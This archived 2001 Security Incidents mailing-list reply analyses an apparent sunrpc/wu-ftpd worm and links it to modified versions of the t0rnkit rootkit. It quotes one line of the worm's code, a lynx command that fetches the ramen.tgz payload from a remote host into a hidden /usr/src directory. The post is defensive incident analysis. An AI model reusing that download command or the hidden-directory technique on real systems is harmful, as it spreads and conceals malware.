Security Incidents mailing list archives
Re: sunrpc / wu-ftpd worm ?
From: daniel_gerald () HOTMAIL COM
Date: Tue, 16 Jan 2001 16:03:57 -0000
" lynx -source http://%s:27374 /usr/src/.poop/ramen.tgz "
hmmmm... seems like this is another modified version of Old t0rnkit 7. The use of /usr/src directory for hiding rootkit file is just the same as the old t0rnkit with it's /usr/src/.puta directory. Ever since t0rnkit 7 was made public by author, there has been many modified versions of it, some with plain directory name changes and others with some replacement trojans, however, most or all the versions retains the rootkit directory structures and the config files. -danny.
Current thread:
- Re: sunrpc / wu-ftpd worm ? daniel_gerald (Jan 16)